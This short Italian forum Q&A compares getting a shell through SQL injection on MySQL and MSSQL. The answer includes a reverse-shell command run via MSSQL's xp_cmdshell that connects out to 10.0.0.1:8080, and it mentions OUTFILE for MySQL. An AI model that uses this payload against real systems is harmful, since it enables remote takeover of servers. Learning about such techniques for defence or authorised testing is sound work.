Qual è la differenza tra il caricamento di una shell tramite sqli in mysql vs mssql?
Qual è la differenza tra il caricamento di una shell tramite sqli in mysql vs mssql?
MSSQL ha un comando incorporato chiamato xp_cmdshell che esegue i comandi di sistema per te (quanto utile, eh?). Ecco come si ottiene una shell su un sistema Linux con MSSQL:
EXEC xp_cmdshell ‘bash -i >& /dev/tcp/10.0.0.1/8080 0>&1’
Con MySQL, devi essere davvero intelligente sulle cose e usare OUTFILE, una stored procedure o qualcosa del genere.
Leggi altre domande sui tag shellcode